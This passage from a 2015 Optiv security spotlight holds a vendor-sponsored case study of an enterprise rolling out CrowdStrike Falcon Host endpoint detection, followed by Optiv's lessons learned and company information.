thereby making tools that aid the human<br />
analyst in detecting system-based anomalies<br />
that are indicators of compromise that much<br />
more indispensable.<br />
Solution Components<br />
• CrowdStrike Falcon Host for servers and<br />
workstations<br />
Operationalizing<br />
The most critical task for any security<br />
component deployed in an enterprise setting<br />
is the operationalization of that component.<br />
The importance of integrating a tool into the<br />
workflow and culture of an organization<br />
cannot be overstated. In this case, the<br />
CrowdStrike solution has truly become a<br />
partner with this organization’s security team.<br />
• Executive management allocated<br />
approximately one quarter for full rollout and<br />
operational efficiency, and the CrowdStrike<br />
team was able to achieve deployment and<br />
operational stability within an amazing two<br />
days.<br />
• The team deployed to 75,000 desktop<br />
endpoints and 10,000 servers with minimal<br />
operational overhead, no downtime and no<br />
issues.<br />
• This tremendous success has led the CIO<br />
of the organization to hold this specific<br />
deployment as a “gold standard” for all future<br />
deployments of security tools.<br />
The full integration of the Falcon Host Next-<br />
Generation Endpoint required deployment<br />
into the standard images the organization was<br />
deploying to ensure it was installed by default.<br />
This was achieved quickly at both the desktop<br />
and server level as success with the desktop<br />
team was recognized and adopted quickly by<br />
the server organization. Additionally, training,<br />
playbook creation (operational guides)<br />
and hunt queries were rapidly developed<br />
and deployed through the support of the<br />
CrowdStrike team to ensure rapid uptake.<br />
As part of the operational strategy of the<br />
Falcon Host NGE, the organization brought<br />
on board new headcount to begin to leverage<br />
the newly deployed capabilities. The new<br />
capabilities to hunt required specialized<br />
skills and thus a team of five new analysts<br />
were brought on board to fulfill that<br />
function. The simplicity and ease-of-use of<br />
the management console facilitated rapid<br />
adoption from training to finding over 200<br />
new and previously undiscovered issues in<br />
the environment.<br />
Where CrowdStrike really stands apart<br />
from the competition as a partner is in the<br />
integration into the security operations<br />
function.<br />
• The security team truly partnered with<br />
CrowdStrike’s Security Operations Center<br />
(CSOC) – who in addition to hunting for<br />
unknown threats also provides direct<br />
additional operational feedback and support<br />
on next steps for issues encountered.<br />
• This direct relationship with CrowdStrike’s<br />
talented and knowledgeable CSOC team<br />
provides guidance, leadership and directly<br />
actionable information unavailable from<br />
other next-generation endpoint providers<br />
due to their wealth of threat intelligence<br />
capabilities.<br />
Strategic Benefits of<br />
CrowdStrike Falcon Host<br />
Addressing complex security challenges<br />
often requires complicated implementations,<br />
extensive deployment cycles, training and<br />
process building. Utilizing CrowdStrike Falcon<br />
Host, the organization in this case study was<br />
able to not only deploy rapidly with minimal<br />
impact, but was also able to quickly realize<br />
value from the solution by detecting attacks<br />
that other tools were missing. The value that<br />
is derived from a new security tool which<br />
requires minimal organizational friction to<br />
operationalize should not be overlooked.<br />
From a strategic perspective, the benefits<br />
of the CrowdStrike Falcon Host solution<br />
include the ability to identify sophisticated<br />
and complex adversaries which traditional<br />
security tools miss. Adversaries who take<br />
the time to understand and design attacks<br />
against your environment won’t be caught<br />
with the tools deployed today. They require an<br />
advanced toolkit which can not only identify<br />
previously known patterns but also assist with<br />
the discovery and assessment of previously<br />
unknown attacks. This ability to detect and<br />
identify the unknown unknowns adds value<br />
to organizations that have already optimized<br />
signal-to-noise in their reporting dashboards<br />
and require the capability to detect and respond<br />
to complex attacks. For this organization, the<br />
CrowdStrike Falcon Host tool is a key partner<br />
in their long-term strategic security program<br />
and their continued development of advanced<br />
detection and response capabilities.<br />
Results and Measured Improvement

The degree of success of any security program or initiative can be measured as the ratio of the security benefit gained to the additional business interference created. By this measure the CrowdStrike deployment has been a true success. The deployment cycle, including training and initial use-case creation, took two days across 75,000 workstations and 10,000 servers and generated no negative end-user or operational impact. Measured against that cost, the Falcon Host next-generation endpoint (NGE) tool discovered over 200 security issues that the organization’s other security tools had not detected. The solution achieved rapid value with minimal to no interference.

As the security team continues to use the toolset, they track the number of new attacks and adversary actions that are caught through the Falcon Host NGE and by no other deployed tool. This net-new discovery metric shows the value the solution brings to the organization.
One tremendous advantage of the CrowdStrike solution has become the potential for cost savings through the removal of redundant tools. As the value of the next-generation endpoint solution becomes fully realized, it is possible that dependence on network-based threat detection, sandboxing and mitigation tools can be reduced to the point where many of these tools can simply be discontinued. The security team believes the Falcon Host solution is sufficient to protect key enterprise endpoint assets to the point where these network-based threat mitigation tools are unnecessary. That coverage extends only to assets that run the Falcon Host sensor, so any network-based tool retired on this basis should first be checked for the unmanaged or unsupported devices it still covers.

This portion of the spotlight is a vendor-sponsored case study. Content and views set forth in this portion of the spotlight are those of the vendor and/or the vendor’s customer. Optiv does not endorse, support, represent or guarantee the completeness, truthfulness, accuracy or reliability of any content or views in this portion of the spotlight, and Optiv disclaims responsibility for, and will not be liable for, such content and views. Optiv does not endorse any specific software, hardware, services or solutions.
Lessons Learned

While there is no end in sight to the arms race between attackers and defenders, the tools at the disposal of enterprise security professionals are improving dramatically.
• In the defender’s toolbox, the Next-Generation Endpoint (NGE) category of tools is proving that an evolution in the way endpoint security is handled is both necessary and available.
• The next generation of endpoint tools supports the operational goals of decreasing both the dwell time of adversaries and the impact of their actions, while adding directly to response and remediation capabilities.
• Direct support of incident response capabilities helps scale the most precious resource: human analysts.

For more information about next generation endpoint strategy, please contact Optiv Solutions Research and Development at SolutionsResearch@optiv.com
1125 17th Street, Suite 1700
Denver, CO 80202
800.574.0896
www.optiv.com

Optiv is the largest holistic pure-play cyber security solutions provider in North America. The company’s diverse and talented employees are committed to helping businesses, governments and educational institutions plan, build and run successful security programs through the right combination of products, services and solutions related to security program strategy, enterprise risk and consulting, threat and vulnerability management, enterprise incident management, security architecture and implementation, training, identity and access management, and managed security.

Created in 2015 as a result of the Accuvant and FishNet Security merger, Optiv is a Blackstone (NYSE: BX) portfolio company that has served more than 12,000 clients of various sizes across multiple industries, offers an extensive geographic footprint, and has premium partnerships with more than 300 of the leading security product manufacturers. For more information, please visit www.optiv.com.

© 2015 Optiv Security Inc. All Rights Reserved.
7.15 | F1